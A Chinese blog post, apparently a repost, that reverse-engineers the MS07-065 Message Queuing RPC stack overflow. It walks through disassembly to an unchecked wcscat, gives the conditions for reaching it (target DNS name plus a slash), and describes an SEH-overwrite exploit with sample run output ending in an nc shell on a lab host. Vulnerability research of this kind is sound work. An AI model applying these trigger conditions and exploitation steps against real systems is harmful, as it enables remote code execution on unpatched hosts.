linkboy2004
linkboy2004

MS07-065 Message Queuing Service RPC远程溢出分析

导读:
  漏洞是在UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 的第6个调用引起的。最终通过一个 wcscat()的拷贝造成一个栈溢出.
  查找了一下关于这个接口的一些定义
  http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html
  The Message Queuing service (msmq) runs RPC services, listening on the ncacn_ip_tcptransport. By default, the msmq services opens 4 TCP ports [81], including one or several of 2101/tcp, 2103/tcp, 2105/tcp and 2107/tcp.
  The mqqm.dll(Windows NT MQ Queue Manager) DLL, loaded in the mqsvc.exeprocess, contains the following RPC services:
  fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
  76d12b80-3467-11d3-91ff-0090272f9ea3 v1.0
  1088a980-eae5-11d0-8d9b-00a02453c337 v1.0
  5b5b3580-b0e0-11d1-b92d-0060081e87f0 v1.0
  41208ee0-e970-11d1-9b9e-00e02c064c39 v1.0
   Table 4.49. qmcomm operations
   Interface       Operation number       Operation name
  fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0: qmcomm
  0x00             QMOpenQueue
  0x01             QMGetRemoteQueueName
  0x02             QMOpenRemoteQueue
  0x03             QMCloseRemoteQueueContext
  0x04             QMCreateRemoteCursor
  0x05             QMSendMessageInternal
  0x06             QMCreateObjectInternal
  。。。。。。
  事实上,这个服务运行在2101、2103、2105、2107端口,根据我后来的结果可以看到,这些端口都能够直接溢出
  这个漏洞被微软标记为important,因为在2003偷偷修复了,在xp和2000 professional版本上,这个漏洞利用时候需要验证用户密码,只有在2000 server上,才能够无须身份验证的触发溢出。
  Windows默认是没有装这个服务的,要安装这个服务可以在添加删除程序里,选择添加windows组件。
  
  
  如果是英文版的系统,那么这里可能叫做 Message Queuing
  安装完之后,可以通过 net start msmq 来启动服务。
  服务的进程是 mqsvc.exe, 而服务是在 mqqm.dll 中,所以我们可以反汇编这个dll文件
  用IDA反汇编mqqm.dll后,用mida插件逆向出RPC调用
  
  
  导出IDL文件后,可以看到函数结构如下:3
  /* opcode: 0x06, address: 0x613B5F03 */
  long _QMCreateObjectInternal (
  [in] long arg_1,
  [in][string] wchar_t * arg_2,
  [in][range(0,524288)] long arg_3,
  [in][unique][size_is(arg_3)] char * arg_4,
  [in][range(1,128)] long arg_5,
  [in][size_is(arg_5)] long arg_6[],
  [in][size_is(arg_5)] struct struct_4 arg_7[]
  );
  这个函数结构暂时先不管他,也可以自己重新构造了一个IDL文件.
  通过IDA看 _QMCreateObjectInternal 函数,没过多久就看出了问题所在
  在 QMCreatePrivateQueue 中的 ReplaceDNSNameWithNetBiosName 中,没有对输入进行充分检查,wcscat()导致了一个栈溢出。
  int __cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
  ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z proc near
  Str= dword ptr 4
  Dest= dword ptr 8
  push esi
  push 5Ch ;Ch
  push [esp+8+Str] ;Str
  call ds:__imp__wcschr
  pop ecx
  mov esi, eax
  pop ecx
  push ?g_szMachineName@@3PAGA ;Source
  push [esp+8+Dest] ;Dest
  call ds:__imp__wcscpy
  pop ecx
  pop ecx
  push esi ;Source
  push [esp+8+Dest] ;Dest
  call ds:__imp__wcscat // 溢出
  pop ecx
  pop ecx
  pop esi
  retn
  ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z endp
  伪代码:
  wchar_t *__cdecl ReplaceDNSNameWithNetBiosName(wchar_t *Str, wchar_t *Dest)
  {
  wchar_t *v3; // esi@1
  v3 = _wcschr(Str, 0x5Cu);
  _wcscpy(Dest, g_szMachineName);
  return _wcscat(Dest, v3);
  }
  这里我们后面再回过头来看。
  那么,函数调用是这样的:
  _QMCreateObjectInternal
  |---------------QMCreatePrivateQueue
  |-------------------ReplaceDNSNameWithNetBiosName
  _QMCreateObjectInternal的伪代码为:
  signed int __thiscall QMCreateObjectInternal(struct _RTL_CRITICAL_SECTION *this, RPC_BINDING_HANDLE Binding, unsigned int Type, wchar_t *Str, int a5, int a6, int a7, int a8, int a9)
  {
  __int32 v10; // edi@6
  __int32 v11; // eax@7
  int v12; // ST18_4@9
  struct _RTL_CRITICAL_SECTION *v13; // [sp+4h] [bp-10h]@1
  int v14; // [sp+10h] [bp-4h]@4
  v13 = this;
  if ( a5 &&!a6 )
  {
  LogMsgHR(-1072824314, off_6B27271C, 0x125u);
  return -1072824314;
  }
  v13 = &qmcmd_cs;
  EnterCriticalSection(&qmcmd_cs);
  v14 = 0;
  if ( Type == 1 )
  {
  v12 = 1;
  goto LABEL_14;
  }
  if ( Type == 2 )
  {
  Type = 0;
  v11 = I_RpcBindingInqTransportType(Binding, &Type);
  if ( v11 )
  goto LABEL_20;
  if ( Type == 4 )
  {
  v12 = 0;
  LABEL_14:
  v10 = CQPrivate__QMCreatePrivateQueue(Str, a5, a6, a7, a8, a9, v12);
  goto LABEL_15;
  }
  if ( v11 )
  LABEL_20:
  LogMsgRPCStatus(v11, off_6B27271C, 0x28u);
  LeaveCriticalSection(&qmcmd_cs);
  return -1072824283;
  }
  v10 = -1072824319;
  LABEL_15:
  if ( v10 <0 )
  LogMsgHR(v10, off_6B27271C, 0x32u);
  LeaveCriticalSection(&qmcmd_cs);
  return v10;
  }
  ============= 这是华丽的分割线 ================
  首先要调用到 QMCreatePrivateQueue .
  我们看到以下是依次是 _QMCreateObjectInternal的六个参数
  Type= dword ptr 0Ch
  Str= dword ptr 10h
  arg_C= dword ptr 14h
  arg_10= dword ptr 18h
  arg_14= dword ptr 1Ch
  arg_18= dword ptr 20h
  arg_1C= dword ptr 24h
  看以下代码片段
  loc_6B22555B: ;CCriticalSection qmcmd_cs
  mov esi, offset ?qmcmd_cs@@3VCCriticalSection@@A
  push esi ;lpCriticalSection
  mov [ebp+var_10], esi
  call ds:__imp__EnterCriticalSection@4 ;EnterCriticalSection(x)
  mov eax, [ebp+Type]
  mov [ebp+var_4], ebx
  dec eax
  jz short loc_6B2255C1
  在代码中,如果eax为1,dec eax后条件为真,会跳转到QMCreatePrivateQueue 去执行
  而eax是由mov eax, [ebp+Type]传入的
  所以要让流程走到QMCreatePrivateQueue
  _QMCreateObjectInternal的第一个参数必须是为0x00000001
  以下是 QMCreatePrivateQueue的调用
  loc_6B2255C3: ;int
  push [ebp+arg_1C]
  mov ecx, offset ?g_QPrivate@@3VCQPrivate@@A ;CQPrivate g_QPrivate
  push [ebp+arg_18] ;int
  push [ebp+arg_14] ;int
  push [ebp+arg_10] ;int
  push [ebp+arg_C] ;int
  push [ebp+Str] ;Str
  call ?QMCreatePrivateQueue@CQPrivate@@QAEJPBGKPAXKQAKQAUtagPROPVARIANT@@H@Z ;CQPrivate::QMCreatePrivateQueue(ushort const *,ulong,void *,ulong,ulong * const,tagPROPVARIANT * const,int)
  实际上,我们在后面可以看到,漏洞是由于QMCreatePrivateQueue的第一个参数,也就是_QMCreateObjectInternal的第二个参数所造成的。
  进入QMCreatePrivateQueue 之后,我们要调用到 ReplaceDNSNameWithNetBiosName.
  以下是代码片段
  .text:6B2178A9 mov eax, offset sub_6B25BE64
  .text:6B2178AE call __EH_prolog
  .text:6B2178B3 sub esp, 138h
  .text:6B2178B9 push ebx
  .text:6B2178BA push esi
  .text:6B2178BB mov esi, [ebp+8]
  .text:6B2178BE lea eax, [ebp-1Ch]
  .text:6B2178C1 push edi
  .text:6B2178C2 push eax ;int
  .text:6B2178C3 mov [ebp-18h], ecx
  .text:6B2178C6 push esi ;Source
  .text:6B2178C7 call ?IsPathnameForLocalMachine@@YAHPBGPAH@Z ;IsPathnameForLocalMachine(ushort const *,int *)
  .text:6B2178CC xor ebx, ebx ;ebx 清0
  .text:6B2178CE pop ecx
  .text:6B2178CF cmp eax, ebx ;比较ispath函数的返回值
  .text:6B2178D1 pop ecx
  .text:6B2178D2 jnz short loc_6B2178EC ;这里有个判断
  .text:6B2178EC cmp [ebp-1Ch], ebx ;这里有个判断
  .text:6B2178EF jz short loc_6B217906
  .text:6B2178F1 lea eax, [ebp-144h] ;在栈上
  .text:6B2178F7 push eax ;Dest
  .text:6B2178F8 push esi ;Str 我们传入的参数
  .text:6B2178F9 call ?ReplaceDNSNameWithNetBiosName@@YAXPBGPAG@Z ;ReplaceDNSNameWithNetBiosName(ushort const *,ushort *)
  ========== 这是聪明的分割线 ============
  要走到 ReplaceDNSNameWithNetBiosName ,就需要先绕过 IsPathnameForLocalMachine 这个函数。 我在绕过这个函数上走了很多弯路,花了许多功夫。
  看看IsPathnameForLocalMachine函数:
  中间分析过程很多,这里我就拿重要的说
  mov eax, offset sub_6B25D54C
  call __EH_prolog
  sub esp, 204h
  push ebx
  push esi
  lea eax, [ebp+String1]
  push edi
  push eax ;Dest
  push [ebp+Source] ;Source
  call ?ExtractMachineName@@YAXPBGPAG@Z ;ExtractMachineName(ushort const *,ushort *)
  mov eax, [ebp+arg_4]
  pop ecx
  pop ecx
  mov esi, ds:__imp__CompareStringW@24 ;CompareStringW(x,x,x,x,x,x)
  and dword ptr [eax], 0
  push 0FFFFFFFFh ;cchCount2
  push ?g_szMachineName@@3PAGA ;lpString2
  lea eax, [ebp+String1]
  mov edi, 800h
  push 0FFFFFFFFh ;cchCount1
  push eax ;lpString1
  push 1 ;dwCmpFlags
  push edi ;Locale
  call esi ;CompareStringW(x,x,x,x,x,x) ;CompareStringW(x,x,x,x,x,x)
  dec eax
  dec eax
  jnz short loc_6B2344E9
  ExtractMachineName(ushort const *,ushort *) 这个函数把/x5c 就是斜杠前的名字,就是机器名拷贝到某处,所以我们的传入参数里要有斜杠。
  然后CompareStringW(x,x,x,x,x,x) 函数,把我们传入的斜杠前的那部分和 机器名比较,这里机器名是通过
  push ?g_szMachineName@@3PAGA ;lpString2
  取得的,所以是一个定值。
  对比完后,我们要让返回值不能为2,因为要跳转到下面的地方:
  loc_6B2344E9:
  lea eax, [ebp+String1]
  push 2Eh ;Ch
  push eax ;Str
  call ds:__imp__wcschr
  pop ecx
  test eax, eax
  pop ecx
  jz loc_6B2345DD
  这里会把刚才斜杠前的那部分拿来比较,看中间有没有点,我们要让跳转条件非真,所以我们的传入参数中要带一个“.” 就是/x2e
  然后我们控制流程来到
  push ?g_szMachineName@@3PAGA ;Str
  mov ebx, ds:__imp__wcslen
  call ebx ;__imp__wcslen
  pop ecx
  push eax ;cchCount2
  mov eax, ?g_szMachineName@@3PAGA ;ushort * g_szMachineName
  push eax ;lpString2
  push eax ;Str
  call ebx ;__imp__wcslen
  pop ecx
  push eax ;cchCount1
  lea eax, [ebp+String1]
  push eax ;lpString1
  push 1 ;dwCmpFlags
  push edi ;Locale
  call esi ;CompareStringW(x,x,x,x,x,x) ;CompareStringW(x,x,x,x,x,x)
  dec eax
  dec eax
  jnz loc_6B2345DD
  这里再次把机器名和我们传入的参数比较了一次, 这时候要让跳转条件不成立
  流程继续走到
  .text:6B234531 push ?g_szMachineName@@3PAGA ;Str
  .text:6B234537 call ebx ;__imp__wcslen
  .text:6B234539 cmp [ebp+eax*2+String1], 2Eh
  .text:6B234542 pop ecx
  .text:6B234543 jnz loc_6B2345DD
  .text:6B234549 mov eax, ?g_szComputerDnsName@@3V?$AP@G@@A ;AP  .text:6B23454E test eax, eax
  .text:6B234550 jz short loc_6B234570
  .text:6B234552 lea ecx, [ebp+String1]
  .text:6B234558 push ecx ;Str2
  .text:6B234559 push eax ;Str1
  .text:6B23455A call ds:__imp___wcsicmp ;比较字符串
  .text:6B234560 pop ecx
  .text:6B234561 test eax, eax
  .text:6B234563 pop ecx
  .text:6B234564 jnz short loc_6B234570 ;这里不能跳转
  .text:6B234566 mov ecx, [ebp+arg_4]
  .text:6B234569 push 1
  .text:6B23456B pop eax
  .text:6B23456C mov [ecx], eax
  .text:6B23456E jmp short loc_6B2345DF
  注意这里
  mov eax, ?g_szComputerDnsName@@3V?$AP@G@@A ;AP g_szComputerDnsName
  test eax, eax
  jz short loc_6B234570
  这个dns name是从机器中取的
  .text:6B234552 lea ecx, [ebp+String1]
  .text:6B234558 push ecx ;Str2
  .text:6B234559 push eax ;Str1
  .text:6B23455A call ds:__imp___wcsicmp
  然后马上比较两个串是否相同。
  根据我们的流程需要,最后要走到
  mov ecx, [ebp+arg_4]
  push 1
  pop eax
  mov [ecx], eax
  jmp short loc_6B2345DF
  然后这个天杀的 IsPathnameForLocalMachine 就总算返回为真了,而且我们同时绕过了以下两处的判断:
  .text:6B2178CF cmp eax, ebx ;比较ispath函数的返回值
  .text:6B2178D1 pop ecx
  .text:6B2178D2 jnz short loc_6B2178EC ;这里有个判断
  .text:6B2178EC cmp [ebp-1Ch], ebx ;这里有个判断
  .text:6B2178EF jz short loc_6B217906
  从而让函数流程顺利的执行到了 ReplaceDNSNameWithNetBiosName
  小结下绕过 IsPathnameForLocalMachine 的条件:
  1. 要发送个 目标机器的dnsname 加上 一个斜杠 /
  2. 要是unicode字符串发送dnsname
  实际上从 ReplaceDNSNameWithNetBiosName 这个函数的名字也可以看出来,是要把DNS name替换为 机器名。
  同时也可以看出来这个漏洞的利用条件: 需要知道目标机器的dnsname。
  一般如果机器在域里面,那就是域后缀。
  如下图:
  
  
  我的机器名是: a-dda41398f44f4
  DNS后缀是: .fuck
  注意这个“.”很重要,在触发条件中是一定要的。
  ========= 这是要抓狂的分割线 =================
  现在回过头来看 ReplaceDNSNameWithNetBiosName 的代码:
  push esi
  push 5Ch ;Ch
  push [esp+8+Str] ;Str
  call ds:__imp__wcschr
  pop ecx
  mov esi, eax
  pop ecx
  push ?g_szMachineName@@3PAGA ;Source
  push [esp+8+Dest] ;Dest
  call ds:__imp__wcscpy
  pop ecx
  pop ecx
  push esi ;Source
  push [esp+8+Dest] ;Dest
  call ds:__imp__wcscat
  就是把 / 后面的字符串,wcscat到 机器名后面, 而这个拷贝发生在栈上,没有做长度检查,发生了栈溢出。
  最后我使用覆盖seh 的方法利用成功发送超过2000 bytes字节的stub,保证覆盖到栈底触发异常,然后call ebx执行shellcode
  下面是一个装B的exploit,只适用于我的机器(机器名是a-dda41398f44f4 , dns 后缀是.fuck ),如果你要修改,需要考虑到机器名的不同带来的影响,要重新计算payload长度值. 为啥说这是装B的exploit呢,因为明明有更清晰的exploit写法我不写,要写个可以忽悠很多人的。所以说大家要是以前看到过这种exploit写法又看不懂,那不要灰心,那个人只是和我一样在装B而已!
  Exploit运行效果:
  
  
  Shellcode 使用exitthread退出线程,则可以反复溢出,如果使用seh退出,则会反复执行你的shellcode
  ======== 这是装B的分割线 ===============
  /*
  Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
  by axis
  http://www.ph4nt0m.org
  you should know the dnsname of target to trigger this vuln
  the service runs on port 2103/2105/2107
  D:/soft/develop/MyProjects/temp/Debug>temp.exe -h 192.168.152.100 -p 2103
  --------------------------------------------------------------------------
  -== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
  -== code by axis@ph4nt0m ==-
  -== Http://www.ph4nt0m.org ==-
  -== Tested against Windows 2000 server SP4 ==-
  --------------------------------------------------------------------------
  [+] Attacking default port 2103
  [*]Sending our Payload, Good Luck! ^_^
  [*]Sending RPC Bind String!
  [*]Sending RPC Request Now!
  D:/soft/develop/MyProjects/temp/Debug>
  D:/>nc -vv -n 192.168.152.100 1154
  (UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
  Microsoft Windows 2000 [Version 5.00.2195]

你可能感兴趣的:(网络安全技术,service,string,windows,binding,struct,microsoft)

  • LocalDateTime 转 String igotyback java开发语言
    importjava.time.LocalDateTime;importjava.time.format.DateTimeFormatter;publicclassMain{publicstaticvoidmain(String[]args){//获取当前时间LocalDateTimenow=LocalDateTime.now();//定义日期格式化器DateTimeFormatterformat
  • 每日一题——第九十题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:判断子串是否与主串匹配#include#include#include//////判断子串是否在主串中匹配//////主串///子串///boolisSubstring(constchar*str,constchar*substr){intlenstr=strlen(str);//计算主串的长度intlenSub=strlen(substr);//计算子串的长度//遍历主字符串,对每个可能得
  • 每日一题——第八十四题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:编写函数1、输入10个职工的姓名和职工号2、按照职工由大到小顺序排列,姓名顺序也随之调整3、要求输入一个职工号,用折半查找法找出该职工的姓名#define_CRT_SECURE_NO_WARNINGS#include#include#defineMAX_EMPLOYEES10typedefstruct{intid;charname[50];}Empolyee;voidinputEmploye
  • C#中使用split分割字符串 互联网打工人no1 c#
    1、用字符串分隔:usingSystem.Text.RegularExpressions;stringstr="aaajsbbbjsccc";string[]sArray=Regex.Split(str,"js",RegexOptions.IgnoreCase);foreach(stringiinsArray)Response.Write(i.ToString()+"");输出结果:aaabbbc
  • linux sdl windows.h,Windows下的SDL安装 奔跑吧linux内核 linuxsdlwindows.h
    首先你要下载并安装SDL开发包。如果装在C盘下,路径为C:\SDL1.2.5如果在WINDOWS下。你可以按以下步骤:1.打开VC++,点击"Tools",Options2,点击directories选项3.选择"Includefiles"增加一个新的路径。"C:\SDL1.2.5\include"4,现在选择"Libaryfiles“增加"C:\SDL1.2.5\lib"现在你可以开始编写你的第
  • 将cmd中命令输出保存为txt文本文件 落难Coder Windowscmdwindow
    最近深度学习本地的训练中我们常常要在命令行中运行自己的代码,无可厚非,我们有必要保存我们的炼丹结果,但是复制命令行输出到txt是非常麻烦的,其实Windows下的命令行为我们提供了相应的操作。其基本的调用格式就是:运行指令>输出到的文件名称或者具体保存路径测试下,我打开cmd并且ping一下百度:pingwww.baidu.com>./data.txt看下相同目录下data.txt的输出:如果你再
  • PHP环境搭建详细教程 好看资源平台 前端php
    PHP是一个流行的服务器端脚本语言,广泛用于Web开发。为了使PHP能够在本地或服务器上运行,我们需要搭建一个合适的PHP环境。本教程将结合最新资料,介绍在不同操作系统上搭建PHP开发环境的多种方法,包括Windows、macOS和Linux系统的安装步骤,以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类:集成开发环境:例如XAMPP、WAMP、MAMP,这
  • 关于提高复杂业务逻辑代码可读性的思考 编程经验分享 开发经验java数据库开发语言
    目录前言需求场景常规写法拆分方法领域对象总结前言实际工作中大部分时间都是在写业务逻辑,一般都是三层架构,表示层(Controller)接收客户端请求,并对入参做检验,业务逻辑层(Service)负责处理业务逻辑,一般开发都是在这一层中写具体的业务逻辑。数据访问层(Dao)是直接和数据库交互的,用于查数据给业务逻辑层,或者是将业务逻辑层处理后的数据写入数据库。简单的增删改查接口不用多说,基本上写好一
  • 使用LLaVa和Ollama实现多模态RAG示例 llzwxh888 python人工智能开发语言
    本文将详细介绍如何使用LLaVa和Ollama实现多模态RAG(检索增强生成),通过提取图像中的结构化数据、生成图像字幕等功能来展示这一技术的强大之处。安装环境首先,您需要安装以下依赖包:!pipinstallllama-index-multi-modal-llms-ollama!pipinstallllama-index-readers-file!pipinstallunstructured!p
  • python是什么意思中文-在python中%是什么意思 编程大乐趣
    Python中%有两种:1、数值运算:%代表取模,返回除法的余数。如:>>>7%212、%操作符(字符串格式化,stringformatting),说明如下:%[(name)][flags][width].[precision]typecode(name)为命名flags可以有+,-,''或0。+表示右对齐。-表示左对齐。''为一个空格,表示在正数的左侧填充一个空格,从而与负数对齐。0表示使用0填
  • Python 实现图片裁剪(附代码) | Python工具 剑客阿良_ALiang
    前言本文提供将图片按照自定义尺寸进行裁剪的工具方法,一如既往的实用主义。环境依赖ffmpeg环境安装,可以参考我的另一篇文章:windowsffmpeg安装部署_阿良的博客-CSDN博客本文主要使用到的不是ffmpeg,而是ffprobe也在上面这篇文章中的zip包中。ffmpy安装:pipinstallffmpy-ihttps://pypi.douban.com/simple代码不废话了,上代码
  • python os 环境变量 CV矿工 python开发语言numpy
    环境变量:环境变量是程序和操作系统之间的通信方式。有些字符不宜明文写进代码里,比如数据库密码,个人账户密码,如果写进自己本机的环境变量里,程序用的时候通过os.environ.get()取出来就行了。os.environ是一个环境变量的字典。环境变量的相关操作importos"""设置/修改环境变量:os.environ[‘环境变量名称’]=‘环境变量值’#其中key和value均为string类
  • Redis系列:Geo 类型赋能亿级地图位置计算 Ly768768 redisbootstrap数据库
    1前言我们在篇深刻理解高性能Redis的本质的时候就介绍过Redis的几种基本数据结构,它是基于不同业务场景而设计的:动态字符串(REDIS_STRING):整数(REDIS_ENCODING_INT)、字符串(REDIS_ENCODING_RAW)双端列表(REDIS_ENCODING_LINKEDLIST)压缩列表(REDIS_ENCODING_ZIPLIST)跳跃表(REDIS_ENCODI
  • ARM驱动学习之4小结 JT灬新一 嵌入式C++arm开发学习linux
    ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
  • C++ | Leetcode C++题解之第409题最长回文串 Ddddddd_158 经验分享C++Leetcode题解
    题目:题解:classSolution{public:intlongestPalindrome(strings){unordered_mapcount;intans=0;for(charc:s)++count[c];for(autop:count){intv=p.second;ans+=v/2*2;if(v%2==1andans%2==0)++ans;}returnans;}};
  • openssl+keepalived安装部署 _小亦_ 项目部署keepalivedopenssl
    文章目录OpenSSL安装下载地址编译安装修改系统配置版本Keepalived安装下载地址安装遇到问题安装完成配置文件keepalived运行检查运行状态查看系统日志修改服务service重新加载systemd检查配置文件语法错误OpenSSL安装下载地址考虑到后面设备可能没法连接到外网,所以采用安装包的方式进行部署,下载地址:https://www.openssl.org/source/old/
  • 多线程之——ExecutorCompletionService 阿福德
    在我们开发中,经常会遇到这种情况,我们起多个线程来执行,等所有的线程都执行完成后,我们需要得到个线程的执行结果来进行聚合处理。我在内部代码评审时,发现了不少这种情况。看很多同学都使用正确,但比较啰嗦,效率也不高。本文介绍一个简单处理这种情况的方法:直接上代码:publicclassExecutorCompletionServiceTest{@TestpublicvoidtestExecutorCo
  • 2024.9.6 Python,华为笔试题总结,字符串格式化,字符串操作,广度优先搜索解决公司组织绩效互评问题,无向图 RaidenQ python华为leetcode算法力扣广度优先无向图
    1.字符串格式化name="Alice"age=30formatted_string="Name:{},Age:{}".format(name,age)print(formatted_string)或者name="Alice"age=30formatted_string=f"Name:{name},Age:{age}"print(formatted_string)2.网络健康检查第一行有两个整数m
  • ARM V8 base instruction -- Debug instructions xiaozhiwise Assemblyarm
    /**Debuginstructions*/BRK#imm16进入monitormodedebug,那里有on-chipdebugmonitorcodeHLT#imm16进入haltmodedebug,连接有外部调试硬件
  • 2023最详细的Python安装教程(Windows版本) 程序员林哥 Pythonpythonwindows开发语言
    python安装是学习pyhon第一步,很多刚入门小白不清楚如何安装python,今天我来带大家完成python安装与配置,跟着我一步步来,很简单,你肯定能完成。第一部分:python安装(一)准备工作1、下载和安装python(认准官方网站)当然你不想去下载的话也可以分享给你,还有入门学习教程,点击下方卡片跳转进群领取(二)开始安装对于Windows操作系统,可以下载“executableins
  • 【2022 CCF 非专业级别软件能力认证第一轮(CSP-J1)入门级 C++语言试题及解析】 汉子萌萌哒 CCFnoi算法数据结构c++
    一、单项选择题(共15题,每题2分,共计30分;每题有且仅有一个正确选项)1.以下哪种功能没有涉及C++语言的面向对象特性支持:()。A.C++中调用printf函数B.C++中调用用户定义的类成员函数C.C++中构造一个class或structD.C++中构造来源于同一基类的多个派生类题目解析【解析】正确答案:AC++基础知识,面向对象和类有关,类又涉及父类、子类、继承、派生等关系,printf
  • ubuntu安装wordpress lissettecarlr
    1安装nginx网上安装方式很多,这就就直接用apt-get了apt-getinstallnginx不用启动啥,然后直接在浏览器里面输入IP:80就能看到nginx的主页了。如果修改了一些配置可以使用下列命令重启一下systemctlrestartnginx.service2安装mysql输入安装前也可以更新一下软件源,在安装过程中将会让你输入数据库的密码。sudoapt-getinstallmy
  • 【RabbitMQ 项目】服务端:数据管理模块之绑定管理 月夜星辉雪 rabbitmq分布式
    文章目录一.编写思路二.代码实践一.编写思路定义绑定信息类交换机名称队列名称绑定关键字:交换机的路由交换算法中会用到没有是否持久化的标志,因为绑定是否持久化取决于交换机和队列是否持久化,只有它们都持久化时绑定才需要持久化。绑定就好像一根绳子,两端连接着交换机和队列,当一方不存在,它就没有存在的必要了定义绑定持久化类构造函数:如果数据库文件不存在则创建,打开数据库,创建binding_table插入
  • 非对称加密算法原理与应用2——RSA私钥加密文件 私语茶馆 云部署与开发架构及产品灵感记录RSA2048私钥加密
    作者:私语茶馆1.相关章节(1)非对称加密算法原理与应用1——秘钥的生成-CSDN博客第一章节讲述的是创建秘钥对,并将公钥和私钥导出为文件格式存储。本章节继续讲如何利用私钥加密内容,包括从密钥库或文件中读取私钥,并用RSA算法加密文件和String。2.私钥加密的概述本文主要基于第一章节的RSA2048bit的非对称加密算法讲述如何利用私钥加密文件。这种加密后的文件,只能由该私钥对应的公钥来解密。
  • windows下python opencv ffmpeg读取摄像头实现rtsp推流 拉流 图像处理大大大大大牛啊 opencv实战代码讲解视觉图像项目windowspythonopencv
    windows下pythonopencvffmpeg读取摄像头实现rtsp推流拉流整体流程1.下载所需文件1.1下载rtsp推流服务器1.2下载ffmpeg2.开启RTSP服务器3.opencv读取摄像头并调用ffmpeg进行推流4.opencv进行拉流5.opencv异步拉流整体流程1.下载所需文件1.1下载rtsp推流服务器下载RTSP服务器下载页面https://github.com/blu
  • 华为云分布式缓存服务DCS 8月新特性发布 华为云PaaS服务小智 华为云分布式缓存
    分布式缓存服务(DistributedCacheService,简称DCS)是华为云提供的一款兼容Redis的高速内存数据处理引擎,为您提供即开即用、安全可靠、弹性扩容、便捷管理的在线分布式缓存能力,满足用户高并发及数据快速访问的业务诉求。此次为大家带来DCS8月的特性更新内容,一起来看看吧!
  • Golang语言基础知识点总结 最帅猪猪侠 golang开发语言后端
    Golang语言基础知识点小总结1.go语言有两大类型:值类型:数值类型,bool,string,数组,struct结构体变量直接存储值,内存通常在栈中分配,修改值,不会对源对象产生影响引用类型:指针,slice切片,管道chan,map,interface变量存储的是一个地址,这个地址对应的空间才真正存储数据值,内存通常在堆上分配,当没有任何变量引用这个地址时,该地址对应的数据空间就成为一个垃圾
  • string trim的实现 JamesSawyer
    if(typeofString.prototype.trim!=='function'){String.prototype.trim=function(){//这个正则的意思是//'^''$'表示结束和开始//'^\s*'表示任意以空格开头的空格//'\s*$'表示任意以空格结尾的空格//'\S*'表示任意非空字符//'$1'表示'(\S*(\s*\S*)*)'returnthis.replace
  • C++常见知识掌握 nfgo c++开发语言
    1.Linux软件开发、调试与维护内核与系统结构Linux内核是操作系统的核心,负责管理硬件资源,提供系统服务,它是系统软件与硬件之间的桥梁。主要组成部分包括:进程管理:内核通过调度器分配CPU时间给各个进程,实现进程的创建、调度、终止等操作。使用进程描述符(task_struct)来存储进程信息,包括状态(就绪、运行、阻塞等)、优先级、内存映射等。内存管理:包括物理内存和虚拟内存管理。通过页表映
  • [Swift]LeetCode943. 最短超级串 | Find the Shortest Superstring 黄小二哥 swift
    ★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★➤微信公众号:山青咏芝(shanqingyongzhi)➤博客园地址:山青咏芝(https://www.cnblogs.com/strengthen/)➤GitHub地址:https://github.com/strengthen/LeetCode➤原文地址:https://www.cnblogs.com/streng
  • Dom 周华华 JavaScripthtml
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • 【Spark九十六】RDD API之combineByKey bit1129 spark
    1. combineByKey函数的运行机制   RDD提供了很多针对元素类型为(K,V)的API,这些API封装在PairRDDFunctions类中,通过Scala隐式转换使用。这些API实现上是借助于combineByKey实现的。combineByKey函数本身也是RDD开放给Spark开发人员使用的API之一   首先看一下combineByKey的方法说明:
  • msyql设置密码报错:ERROR 1372 (HY000): 解决方法详解 daizj mysql设置密码
    MySql给用户设置权限同时指定访问密码时,会提示如下错误: ERROR 1372 (HY000): Password hash should be a 41-digit hexadecimal number;   问题原因:你输入的密码是明文。不允许这么输入。   解决办法:用select password('你想输入的密码');查询出你的密码对应的字符串, 然后
  • 路漫漫其修远兮 吾将上下而求索 周凡杨 学习 思索
    王国维在他的《人间词话》中曾经概括了为学的三种境界古今之成大事业、大学问者,罔不经过三种之境界。“昨夜西风凋碧树。独上高楼,望尽天涯路。”此第一境界也。“衣带渐宽终不悔,为伊消得人憔悴。”此第二境界也。“众里寻他千百度,蓦然回首,那人却在灯火阑珊处。”此第三境界也。学习技术,这也是你必须经历的三种境界。第一层境界是说,学习的路是漫漫的,你必须做好充分的思想准备,如果半途而废还不如不要开始。这里,注
  • Hadoop(二)对话单的操作 朱辉辉33 hadoop
    Debug: 1、 A = LOAD '/user/hue/task.txt' USING PigStorage(' ') AS (col1,col2,col3); DUMP A; //输出结果前几行示例: (>ggsnPDPRecord(21),,) (-->recordType(0),,) (-->networkInitiation(1),,)
  • web报表工具FineReport常用函数的用法总结(日期和时间函数) 老A不折腾 finereport报表工具web开发
    web报表工具FineReport常用函数的用法总结(日期和时间函数)   说明:凡函数中以日期作为参数因子的,其中日期的形式都必须是yy/mm/dd。而且必须用英文环境下双引号(" ")引用。   DATE DATE(year,month,day):返回一个表示某一特定日期的系列数。 Year:代表年,可为一到四位数。 Month:代表月份。
  • c++ 宏定义中的##操作符 墙头上一根草 C++
    #与##在宏定义中的--宏展开 #include <stdio.h> #define f(a,b) a##b #define g(a)   #a #define h(a) g(a) int main() {       &nbs
  • 分析Spring源代码之,DI的实现 aijuans springDI源代码
    (转) 分析Spring源代码之,DI的实现 2012/1/3 by tony                 接着上次的讲,以下这个sample [java]  view plain copy print
  • for循环的进化 alxw4616 JavaScript
